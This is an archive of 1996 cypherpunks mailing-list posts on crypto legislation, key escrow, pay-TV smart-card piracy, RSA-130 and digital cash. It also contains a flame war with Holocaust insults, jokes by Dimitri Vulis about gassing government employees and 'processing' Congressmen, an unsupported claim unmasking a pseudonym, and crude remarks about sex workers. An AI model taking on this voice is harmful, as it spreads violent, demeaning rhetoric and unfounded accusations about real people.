> 
> While your interest in Unicorn's essay is understandable, I think you've 
> missed the problems with his point of view.  He's apparently suffering from 
> a disease which is supposed to be common among first year law students, 
> specifically:  Citing legal precedents as if they are some sort of justification 
> for themselves.  You correctly referred to "the bad guys" above as taxing 
> the non-physical, so you're obviously on the right track.  Unicorn, however, 
> does not REALLY think of them as being "the bad guys," in fact his gravy 
> train _depends_ on them!  

That's Herr Reichsmarschall Unicorn to you.

I'd be happy to find other work.  High tax jurisdictions, welfare 
states, and overbearing jurisdiction are, however, unlikely to go away.

I also happen to be independently wealthy, and have been since far before 
I ever took up law.  All that stolen art from my Nazi associates you 
understand.
 
> It is this conflict of interest which drives him to cite precedent after 
> precedent as somehow supporting his nebulous positions.

When my position is:  "Courts are likely to do this."  A cite is entirely 
appropriate.  I don't make public value judgements on the policies of the 
United States in the same way that I don't want the United States to 
impose it's view of "right" on Liechtenstein.

Don't, if you can at all help it, Mr. Bell, confuse recitation of current 
fact with philisophical support for a novel, or as the case may be, 
raving position.

Of course, I'm just a Nazi, so....

> What he misses is 
> that citing these precedents merely destroys whatever confidence we could 
> have in the legal system.

Which is why I provide more practical detours around the problems.

Readers will note that I do this without calling people Nazi's.

> Peter Junger's analysis of the Leahy bill was far more useful, primarily 
> because it focussed on the areas that this bill could be abused.  Unicorn 
> cites cases of abuse frequently, but does not identify them as such, leading 
> me to conclude that all he can do is to cite precedent.

Abuse is in the eye of the beholder.  You are beginning to blur your 
useage of the word "abuse" as badly as you were complaining about the 
court's use of the word "malice."  But perhaps its just the 
national-socialist need for order in me that makes me say so.

> 
> Jim Bell
> jimbell@pacifier.com
>

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 08:24:57 +0800
To: JonWienke@aol.com
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <960330120159_181484785@emout09.mail.aol.com>
Message-ID: <Pine.SUN.3.91.960330141751.22592D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996 JonWienke@aol.com wrote:

> The concept of encrypting a key before escrowing it is excellent.  It
> prevents the escrow agent from misusing the key, and protects the principal
> from government snooping.  If the escrow agent is served a subpoena, he can
> say, "Here is the key you want. Go ahead and take it.  In fact, here is my
> entire key database.  All keys are encrypted by the principals before I get
> them, so I can't guarantee that you will be able to use them, but here they
> are anyway."  At this point, the LEO's can take whatever they want, but the
> principals are still safe.  The escrow agent doesn't have to send any
> encrypted "rosebud" message to anyone, and he can bend over backwards to make
> the LEO's happy, so his butt is covered, too.  At this point, the LEO's can
> either (a) send the keys to the NSA for decryption, and thereby admit that
> the gov't can break IDEA (or whatever cryptosystem was used to encrypt the
> keys before the escrow agent got them), (b) rubber hose the unencrypted
> key(s) from the principal, or (c) go home and pout.

(d) [which may be a subset of (b)] impose contempt sanctions on the 
principal until he releases the key to the key.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 31 Mar 1996 20:41:46 +0800
To: kooltek@iol.ie (Hack Watch News)
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <199603302219.OAA13688@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:10 PM 3/29/96 -0800, Mike Duvos wrote:
>kooltek@iol.ie (Hack Watch News) writes:
> > The most dangerous thing in all this is that the smart
> > cards that have been hacked in Pay TV systems throughout
> > the world are also used in other applications. The expertise
> > and the knowledge of reversing smart cards is now more
> > common in the Pay TV piracy business. There is always the
> > possibility that these skills could be applied elsewhere.
>
>Perhaps in the private sector, where snake oil abounds.  I
>suspect military types do things a bit more cleverly than the
>prior scenario implies.

This observation has direct application to the Mondex electronic cash system.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddt@lsd.com
Date: Sun, 31 Mar 1996 10:34:49 +0800
Subject: No Subject
Message-ID: <v03005b00ad83359736a6@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


References: <m0u2tez-0008xlC@pacifier.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Sender: New Millennium Communications / Boulder, CO.
X-PGP-KeyID-Fprnt: 4AAF00E5 - 30D81F3484E6A83F  6EC8D7F0CAB3D265
X-PGP: http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=lsd
X-Floppyright: (f)1995 Unlicensed retransmission prohibited.
Date: Sat, 30 Mar 1996 14:07:55 -0500
To: Black Unicorn <unicorn@schloss.li>
From: Dave Del Torto <ddt@lsd.com>
Subject: Re: The limits of my patience.
Cc: jim bell <jimbell@pacifier.com>, cypherpunks@toad.com

At 8:43 am 3/30/96, Black Unicorn wrote:
>On Fri, 29 Mar 1996, jim bell wrote:
>>
>> >Anyone who knows me knows I spend all my days end arounding the
>> >U.S. government.
>>
>> Explains a lot!   You _are_ paid for this.  In an earlier era, you would
>> have gladly run the ovens at Auschwitz if you'd gotten paid for it.
>
>You're way out of line here.
>I expect an apology.
>
>I've dedicated a lot of time to addressing your issues.  You have
>repeatedly and preemptively brought the discussion into the realms of
>personal attack.  I have endured and rebutted thus far, but you have
>really crossed the line of decency here.  Being called an ass I can
>tolerate, the above I cannot.

I agree: this sort of ad hominem attack has no place in a civilized,
reponsible debate on an important topic.

As for Unicorn's end-runs around the govt: I support anyone who challenges
his (or any other) government in order to keep it honest, to the extent
that they do so constructively. I hope you act responsibly, Uni.

Jim, I think you owe Unicorn a public apology, and I think it ought to be
now. If I don't see one, I'm going to feel quite OK about filtering you out
of my future archives of cpunks. Let's see how civilized you're capable of
being: we know you can talk through your "other" orifices.

   dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 31 Mar 1996 14:16:11 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What backs up digital money?
In-Reply-To: <Pine.SUN.3.91.960330093914.13577C-100000@polaris.mindport.net>
Message-ID: <Pine.SOL.3.91.960330141633.9993B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


[Everyone's ignoring the obvious answer: Exabyte's, silly :)]

I find it kind of strange that many people are advocating setting up 
nano-currencies when lots of central-bank grownups in the EU are still 
bang-up for monetary union. I'd be interested to hear why so many people 
think the massive extra costs involved in adding 1000s of extra private 
negotiable currencies will somehow be worth it (apart from FOREX and 
derivatives arbitragers).

If I was going to create a purely digital currency I'd want to do it at a 
supra-national scale (e.g. the Euro or maybe even the UNO); otherwise why 
not just treat chaumian cash as just another payment instrument.





---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 31 Mar 1996 13:29:33 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: PGP Crack???
In-Reply-To: <199603300650.WAA06087@netcom15.netcom.com>
Message-ID: <Pine.SUN.3.92.960330141236.24223B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Mar 1996, Mike Duvos wrote:

> On a more serious note, does anyone know what is happening
> with Arjen Lenstra and RSA-130?  Last I heard back in late
> December, FAFNER, the magic WWW sieving dragon, had collected
> more than enough relations from participants to yield a
> factorization.  Surely they have not spent an additional four
> months crunching the big boolean matrix at CWI.

Apparently the Cray they are using to crunch the matrix is busy with
higher priority users and they have not been able to squeeze in enough CPU
time.  I was told at the beginning of March that they didn't expect to
finish before late April, but now it looks like the job will take another
two to three months.  Anyone got a spare supercomputer laying around?

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 31 Mar 1996 13:25:27 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Note: Problems Confronting the Asset Concealer [Part 1 of 2 of Volume I]
In-Reply-To: <199603301540.KAA07025@homeport.org>
Message-ID: <Pine.SOL.3.91.960330143253.9993C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


I'm a non-american living in the us, benefiting from writing crypto (or 
at least implementing stuff based on crypto primitives). You need to 
get an export licence, but I gather they're normally pretty automatic.

I don't know if this depends on nationality though

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 20:02:55 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: The limits of my patience.
In-Reply-To: <287LLD31w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960330152308.25376E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, Dr. Dimitri Vulis wrote:

> Black Unicorn <unicorn@schloss.li> writes:
> 
> > On Fri, 29 Mar 1996, jim bell wrote:
> > >
> > > >Anyone who knows me knows I spend all my days end arounding the
> > > >U.S. government.
> > >
> > > Explains a lot!   You _are_ paid for this.  In an earlier era, you would
> > > have gladly run the ovens at Auschwitz if you'd gotten paid for it.
> >
> > You're way out of line here.
> > I expect an apology.
> 
> Consider the above in context. Would you be willing to run the ovens/gas
> chambers if you were exterminating U.S. government employees/contractors?

No, I would not.  That's the difference between me and you- er... Mr. Bell.

> "The final solution to the IRS/BATF problem." :-)
> 
> ---
> Dr. Dimitri Vulis
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 20:12:51 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u36wg-0008yEC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960330151639.25376D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, jim bell wrote:

> give up information to the detriment of citizens.  Ironically, this will 
> make people like Unicorn useful, because whether or not his morality is 
> intact he may have plenty of examples of how government abuses its position. 

Boy you have a lot of nerve to talk to me about morality.
But hey, I'm just a Nazi anyhow.

>  However, he doesn't appear to have the mental wherewithall or inclination 
> to turn those facts into sketches of effective countermeasures.

I've forgotten more about creating and distributing countermeasures to the 
U.S. exercise of jurisdiction than your rambling-radical-conspiracy rants 
and personal attacks will ever fool others into thinking you ever had.

Put up or shut up.

Then again, as I'm a Nazi....

> Jim Bell
> jimbell@pacifier.com
>
---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Sun, 31 Mar 1996 20:02:05 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: The limits of my patience. (suggested solution)
Message-ID: <199603302329.PAA08279@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 AM 3/30/96 -0800, you wrote:
>At 08:43 AM 3/30/96 -0500, Black Unicorn wrote:
>>On Fri, 29 Mar 1996, jim bell wrote:
>>> Explains a lot!   You _are_ paid for this.  In an earlier era, you would 
>>> have gladly run the ovens at Auschwitz if you'd gotten paid for it.
>>You're way out of line here.
>>I expect an apology.
>And as a form of protest, I recommend that you refuse to post any more 
>messages to CP until you get it!  That would solve a lot of problems, I think.

An apology was warranted. This is not a flaming ground.

Your remarks have undermined any credibility you may have had.

That whirring sound is the kill files and filter --> trash being cranked up.

I am CC:ing to cypherpunks to recommend this simple soluton.


   Adam, Esq.

-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|     My PGP key is available on my     |Unauthorized interception violates |
|    home page: http://www.rosa.com     |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...see home page for definition|communications are preferred for   | 
|          -=[ FUCK THE CDA]=-          |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/
Success: If A is a success in life, then A equals x plus y plus z. Work is x;
y is play; and z is keeping your mouth shut. Albert Einstein (1879-1955)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 31 Mar 1996 19:51:50 +0800
To: Alan Horowitz <alanh@mailhost.infi.net>
Subject: RE: Why Americans feel no compulsion to learn foreign langua
Message-ID: <2.2.32.19960330092924.0068346c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:18 AM 03/30/96 -0500, Alan Horowitz wrote:
>> From: David K. Merriman <merriman@arn.net>
>
>> >restroom-finding in a few languages.
>> 
>> The second necessarily follows from the first :-)
>
>    While deployed to a remote radar station on an isolated island,
>supplied solely by periodic but unreliable airfreight sorties, I oft found
>myself wondering:  which is the more acute emergency.... to run out of food
>or to run out of toilet paper? 

Why do you think they make those government instruction manuals so thick? :-)

Dave "Adak - where suicide is redundant" Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 31 Mar 1996 20:02:46 +0800
To: cypherpunks@toad.com
Subject: Re: What happened with Cypherpunks?
Message-ID: <199603302339.PAA18937@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM 3/30/96 -0600, Igor Chudov @ home wrote:
>Sorry if it is an offtopic question... Has something happened with 
>this mailing list? In the last two weeks I received only one article.
>
>My system log indicates that no messages have been received by our
>machine.

When many of us at Netcom went a week without a feed, I tried to find out
what was going on.  The best explanation I could get was:\

>From: David Lesher <wb8foz@nrk.com>
>Subject: Re: cipherpunk mail at Netcom.com
>To: frantz@netcom.com (Bill Frantz)
>Date: Thu, 8 Feb 1996 10:18:44 -0500 (EST)
>Cc: stewards@ix.netcom.com
>Reply-To: wb8foz@nrk.com
>X-Mailer: ELM [version 2.4 PL24]
>
>The problem is toad.com is broken.
>It refuses to pass mail to an MX address, so it's hacked to
>ALWAYS pass mail to mail12.netcom.com, I think it is.
>
>If it used MX's, it would be poll about 15 machines at netcom,
>until it found one accepting connections.
>
>
>-- 
>A host is a host from coast to coast.................wb8foz@nrk.com
>& no one will talk to a host that's close........[v].(301) 56-LINUX
>Unless the host (that isn't close).........................pob 1433
>is busy, hung or dead....................................20915-1433
>

The following comment also applies:
>X-Sender: stewarts@popd.ix.netcom.com
>X-Mailer: Windows Eudora Light Version 1.5.2
>Date: Thu, 08 Feb 1996 00:10:53 -0800
>To: frantz@netcom.com (Bill Frantz)
>From: Bill Stewart <stewarts@ix.netcom.com>
>Subject: Re: cipherpunk mail at Netcom.com
>
>No denial of service attack involved; netcom and toad are slightly
>incompatible with each other and they do this every six months or so.
>Of course, I'd blame that on netcom :-)
>#--
>#                               Thanks;  Bill
># Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com
>+1-415-442-2215
># http://www.idiom.com/~wcs
>
>
If your problem is behaves the same as the one we at Netcom experienced,
after about a week, it goes away and ALL the pending mail descends on your
mail box.  In my case it was over 1000 messages.

Good Luck - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 30 Mar 1996 19:11:04 +0800
To: cypherpunks@toad.com
Subject: Re: trouble with idea.c from cryptl99.zip
Message-ID: <199603300350.PAA14507@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Tall men in dark suits made Jack Mott <thecrow@iconn.net> write:
 
>Hey, I downloaded the crypto lib 'cryptl99.zip' from one of the crypto web
>sites, I got IDEA.C to compile, but it doesn't seem to encrypt.
>
>[...]
>       memcpy(YY, XX, 8);
>       for (l = 0; l < BLOCKS; l++)
>               ideaCipher(YY, YY, EK); /* repeated encryption */
>       memcpy(ZZ, YY, 8);
>       for (l = 0; l < BLOCKS; l++)
>               ideaCipher(ZZ, ZZ, DK); /* repeated decryption */
 
Arrgghh!!! That defeats the whole purpose of the library, which is to provide a
standard interface to many different algorithms.  If you use the routine the
way it's meant to be used (via initCryptContext(), etc) it'll work fine.
 
BTW the reason it isn't encrypting is that by the looks of it you're not
calling the IDEA key schedule code.
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 31 Mar 1996 13:56:00 +0800
To: perry@piermont.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <199603302117.QAA17076@jekyll.piermont.com>
Message-ID: <199603302351.PAA03993@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

 > Not true at all, Mike. Consider the threat model.

 > You have a single satelite sending out a single encrypted
 > stream to millions of people.

That is correct.

 > Your goal is to let some people view the signal
 > and others not view the signal...

That is also correct.

 > ...in spite of the fact that some of the people viewing the
 > signal might be willing to leak information (such as the
 > keys!) to the people who aren't supposed to view it.

Certainly anyone authorized to view the program can "leak" that
program to other users.  Indeed, with the European system, people
have set up transmitters which simply run off a decoder that
subscribes to every program.  Not exactly subtle, but in
jurisdictions where such activity carries no significant legal
sanctions, an efficient approach to the problem.

Much like the case of sending an encrypted PGP message to
multiple recipients.  One or more of the legitimate recipients
can tell others what the message says.  Not a negative reflection
on the strength of PGP, and certainly not something I spend a lot
of time worrying about.

In the system I described, a person might make a lower bandwidth
attempt to defeat the system by leaking either the periodically
changing random session key used to encrypt the video stream, or
the unique cryptographic key belonging to a particular smart card
authorized to view the program.  We have postulated that the
latter is not recoverable even by destructive reverse engineering
of a specific card, and were such information to be compromised
upstream where the programming originates, it would only be
necessary to reissue new cards to the affected subscribers and
cancel the old ones.

Leakage of the periodically changing random session key directly
would require significant surgery to a working smart card,
although it might be recovered by tapping appropriate points in
the circuitry.  However, anyone using such information for
unauthorized reception would require a constant connection to a
provider to continually update the key, which would be awkward,
and not likely to be done by a large population of people in a
way which was inconspicuous to LEAs.

I can't imagine that a significant market for pirate equipment
could be built around any of the attacks described above. Indeed,
a significant market exists only for ersatz smartcards which a
person can purchase for a fixed price, stick in their decoder,
and then forget about.  The system I described would certainly
preclude such a device from being built.

I spent a bit of time on the Web last night reading up on the
various attacks which were mounted against DSS and the earlier
European VideoCrypt system.  The implementors put what they
though were a lot of cute features into the cards, including the
ability to reprogram them from upstream when software updates
were needed.  Unfortunately, rather than relying totally upon
strong cryptography within a tamperproof module, they also
employed easily forged checksums to validate commands sent to
the cards, and "security through obscurity" as to what those
commands were.

The ultimate result was that the cards were being updated with
new software almost constantly, and the hackers were issuing
updates to the pirate versions within hours each time this was
done.  Given the way the system had been implemented, there was
really no way prevent this from happening.

 > In other words, you are trying to do something that no
 > amount of technology can really do. At best, by using enough
 > tamperproof equipment you can stave off the inevitable for a
 > while.

If what you are trying to do is make sure no subscriber will
ever disclose, by any means, the contents of a program to a
non-subscriber, then of course you are right.  There is no
technology which can prevent this.

If, on the other hand, you wish to prevent clever engineers
from looking at the system with instrumentation, and then
trotting off and stamping out millions of their own smart
cards, which interoperate with the legitimate ones and
decode all programming transmitted, this is something that
can certainly be done by using strong cryptography correctly.

It is this latter goal which the VideoCrypt system, and now
apparently the DSS one as well, failed to accomplish.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 13:25:54 +0800
To: Black Unicorn <JonWienke@aol.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u3AZL-0008yEC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:19 PM 3/30/96 -0500, Black Unicorn wrote:
>On Sat, 30 Mar 1996 JonWienke@aol.com wrote:
>
>> The concept of encrypting a key before escrowing it is excellent.  It
>> prevents the escrow agent from misusing the key, and protects the principal
>> from government snooping.  If the escrow agent is served a subpoena, he can
>> say, "Here is the key you want. Go ahead and take it.  In fact, here is my
>> entire key database.  All keys are encrypted by the principals before I get
>> them, so I can't guarantee that you will be able to use them, but here they
>> are anyway."  At this point, the LEO's can take whatever they want, but the
>> principals are still safe.  The escrow agent doesn't have to send any
>> encrypted "rosebud" message to anyone, and he can bend over backwards to make
>> the LEO's happy, so his butt is covered, too.  At this point, the LEO's can
>> either (a) send the keys to the NSA for decryption, and thereby admit that
>> the gov't can break IDEA (or whatever cryptosystem was used to encrypt the
>> keys before the escrow agent got them), (b) rubber hose the unencrypted
>> key(s) from the principal, or (c) go home and pout.
>
>(d) [which may be a subset of (b)] impose contempt sanctions on the 
>principal until he releases the key to the key.

...which would be a clear violation of the 5th amendment, and would (by 
informing the person targeted) defeat the entire purpose of getting the key 
in the first place.  Of course, you've also assumed that the escrowed data 
actually represents some sort of key, which it may not. (The data-holder is 
never told that the data he's asked to hold is REALLY a key!)  

 Insisting that the target of an investigation provide something that may 
not even exist is a sure way to fire up the populace.  Remember Madame 
Defarge (sp?)

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Mar 1996 20:22:46 +0800
To: cypherpunks@toad.com
Subject: Re: The limits of my patience.
In-Reply-To: <Pine.SUN.3.91.960330152308.25376E-100000@polaris.mindport.net>
Message-ID: <ZegmLD37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Lance Detweiller posting as Black Unicorn <unicorn@schloss.li> writes:

> On Sat, 30 Mar 1996, Dr. Dimitri Vulis wrote:
>
> > Black Unicorn <unicorn@schloss.li> writes:
> >
> > > On Fri, 29 Mar 1996, jim bell wrote:
> > > >
> > > > >Anyone who knows me knows I spend all my days end arounding the
> > > > >U.S. government.
> > > >
> > > > Explains a lot!   You _are_ paid for this.  In an earlier era, you would
> > > > have gladly run the ovens at Auschwitz if you'd gotten paid for it.
> > >
> > > You're way out of line here.
> > > I expect an apology.
> >
> > Consider the above in context. Would you be willing to run the ovens/gas
> > chambers if you were exterminating U.S. government employees/contractors?
>
> No, I would not.  That's the difference between me and you- er... Mr. Bell.

Finally, Lance blew his nym.

So, do you think that I'm Jim Bell's tentacle or that he's my tentacle?

> > "The final solution to the IRS/BATF problem." :-)

And what if you were "processing" U.S. Congressmen?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 31 Mar 1996 09:59:25 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <199603300210.SAA09465@netcom3.netcom.com>
Message-ID: <199603302117.QAA17076@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> Once you have both audio and video streams in digital form,
> having ones encryption "hacked" is more a function of
> cluelessness on the part of those engineering the encryption and
> authentication mechanism than some latent vulnerability on the
> part of the technology.

Not true at all, Mike. Consider the threat model.

You have a single satelite sending out a single encrypted stream to
millions of people. Your goal is to let some people view the signal
and others not view the signal in spite of the fact that some of the
people viewing the signal might be willing to leak information (such
as the keys!) to the people who aren't supposed to view it.

In other words, you are trying to do something that no amount of
technology can really do. At best, by using enough tamperproof
equipment you can stave off the inevitable for a while.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 31 Mar 1996 09:54:16 +0800
To: cypherpunks@toad.com
Subject: SNI_ffs
Message-ID: <199603302137.QAA08281@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-30-96 TWP reports on an Argentinian hacker who penetrated
   a slew of sensitive networks and how the FBI tracked him by
   getting a warrant to run a sniffer-filter at Harvard, the
   POE.

   The hacker's dad, a Lt. Col., barks, "The Yankees don't
   have the slightest idea about security. If a kid can enter,
   they should be ashamed to admit it."

   The Feds snort, "The case underscores the vulnerability of
   computer systems worldwide, a preview of a coming era of
   cyber-sleuthing, what computer crime-fighting will look
   like in the coming years." And that it shows they can catch
   tresspassers without violating other users' privacy.

   Banisar sniffs, "The case shows that there's a need for
   more encryption."


   SNI_ffs








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kim Johansson <jkim@sn.no>
Date: Sun, 31 Mar 1996 03:41:18 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: unsuscribe
Message-ID: <199603301544.QAA23304@ekeberg.sn.no>
MIME-Version: 1.0
Content-Type: text/plain



unsuscribe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Sun, 31 Mar 1996 04:54:23 +0800
To: cypherpunks@toad.com
Subject: Re: Note: Problems Confronting the Asset Concealer [Part 1 of 2 of Volume I]
Message-ID: <199603301648.QAA26804@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:

> Practical and Legal Problems Confronting the Asset Concealer in
> Relation to Offshore Financial and Corporate Entities:  A View from
> the Perspective of the Individual Attempting to Avoid Extraterritorial
> Discovery, Attachment, or Coercion.

"Laundernomicon?"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Mar 1996 20:01:50 +0800
To: cypherpunks@toad.com
Subject: RE: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <199603301919.LAA26825@dns1.noc.best.net>
Message-ID: <FRimLD40w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com writes:
> A foreign language is useful only when there are large numbers of
> folk around who speak *one* *particular* foreign language, and these
> folk have knowledge and skills and power and wealth, for example
> if you are close neighbor of Germany or France.

Why do you suppose people study Latin or Sanskrit or classical Greek?

> Americans feel no compulsion to learn foreign languages because
> the only time they need a foreign language is spanish to
> negotiate with whores.

It's interesting to note that while Tim speaks Spanish to gardeners,
James speaks Spanish to whores. Can't blame him, considering what
American women must be like where he lives. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 31 Mar 1996 19:37:27 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Electronic locksmiths are watching you (Belgium's ban onPGP)
In-Reply-To: <m0u2u7W-0008xVC@pacifier.com>
Message-ID: <v03005b01ad8337b0b4e9@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:25 am 3/30/96, jim bell wrote:
[elided]
>I think it's obvious that governments around the world have a very poor
>record of responding "well" to encryption with any kind of acceptable
>legislation.  Arguably, laws should exist for the benefit of the public, but
>what's happening is that governments are using their authority to try to
>restrain the political consequences of technical developments.  I see no
>benefit to the public in laws against encryption, and certainly no net
>benefit.
>
>We should be particularly suspicious of any hint of a pan-European ban or
>control of encryption, because that is exactly the kind of development that
>could usher in a secretly-negotiated treaty that might be argued to be
>binding on the public.               [elided]

IMHO, this represents a very America-centric, and a rather innacurate, view
of the world. Sure, we live in a great country in many ways. Sure, we still
enjoy many priviledges, such as owning and using strong crypto. In point of
fact, though, the US is by far the most "behind" country in the wired world
